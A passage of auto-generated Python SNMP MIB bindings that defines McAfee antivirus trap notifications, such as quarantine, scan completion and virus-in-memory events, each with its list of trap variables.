"mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_EXCLUDEERR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1030)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_INFECTION_ACESSDENIED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1031)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_VIRUS_QUARANTINED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1032)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_VIRUS_QUARANTINE_FAILURE = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1033)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCANEND_NO_VIRUSES = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1034)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCAN_CANCELED = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1035)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_VIRUS_FOUND_IN_MEMORY = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1036)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_VIRUS_IN_BOOT_RECORD = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1037)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCAN_FOUND_INFECTED_FILES = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1038)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_SCAN_FOUND_AND_CLEANED_INFECTIONS = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1039)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_ALOG_ERROR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1040)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
mcafee_EVENT_MEMALLOC_ERROR = NotificationType((1, 3, 6, 1, 4, 1, 3401, 12, 0) + (0,1041)).setObjects(("NAI-MIB", "naiTrapAgent"), ("NAI-MIB", "naiTrapShortDescription"), ("NAI-MIB", "naiTrapSeverity"), ("TVD-MIB", "mcafee_SOURCEIP"), ("TVD-MIB", "mcafee_GMTTIME"), ("NAI-MIB", "naiTrapAgentVersion"), ("NAI-MIB", "naiTrapLongDescription"), ("NAI-MIB", "naiTrapProblemResolution"), ("NAI-MIB", "naiTrapDiagID"), ("NAI-MIB", "naiTrapURL"), ("NAI-MIB", "naiTrapSourceDNSName"), ("TVD-MIB", "mcafee_TIME"), ("TVD-MIB", "mcafee_TARGETIP"), ("NAI-MIB", "naiTrapTargetDNSName"), ("TVD-MIB", "mcafee_TRAPID"), ("TVD-MIB", "mcafee_ENGINEVERSION"), ("TVD-MIB", "mcafee_DATVERSION"), ("TVD-MIB", "mcafee_ENGINESTATUS"), ("TVD-MIB", "mcafee_VIRUSNAME"), ("TVD-MIB", "mcafee_VIRUSTYPE"), ("TVD-MIB", "mcafee_FILENAME"), ("TVD-MIB", "mcafee_USERNAME"), ("TVD-MIB", "mcafee_OS"), ("TVD-MIB", "mcafee_PROCESSORSERIAL"), ("TVD-MIB", "mcafee_NUMVIRS"), ("TVD-MIB", "mcafee_NUMCLEANED"), ("TVD-MIB", "mcafee_NUMDELETED"), ("TVD-MIB", "mcafee_NUMQUARANTINED"), ("TVD-MIB", "mcafee_SCANRETURNCODE"), ("TVD-MIB", "mcafee_MAILFROMNAME"), ("TVD-MIB", "mcafee_MAILTONAME"), ("TVD-MIB", "mcafee_MAILCCNAME"), ("TVD-MIB", "mcafee_MAILSUBJECTLINE"), ("TVD-MIB", "mcafee_MAILIDENTIFIERINFO"), ("TVD-MIB", "mcafee_LANGUAGECODE"), ("TVD-MIB", "mcafee_CLIENTCOMPUTER"), ("TVD-MIB", "mcafee_TSCLIENTID"), ("TVD-MIB", "mcafee_ACCESSPROCESSNAME"), ("TVD-MIB", "mcafee_NOTEID"), ("TVD-MIB", "mcafee_NOTESSERVERNAME"), ("TVD-MIB", "mcafee_NOTESDBNAME"), ("TVD-MIB", "mcafee_DOMAIN"), ("TVD-MIB", "mcafee_OBRULE"), ("TVD-MIB", "mcafee_EVENTNAME"))
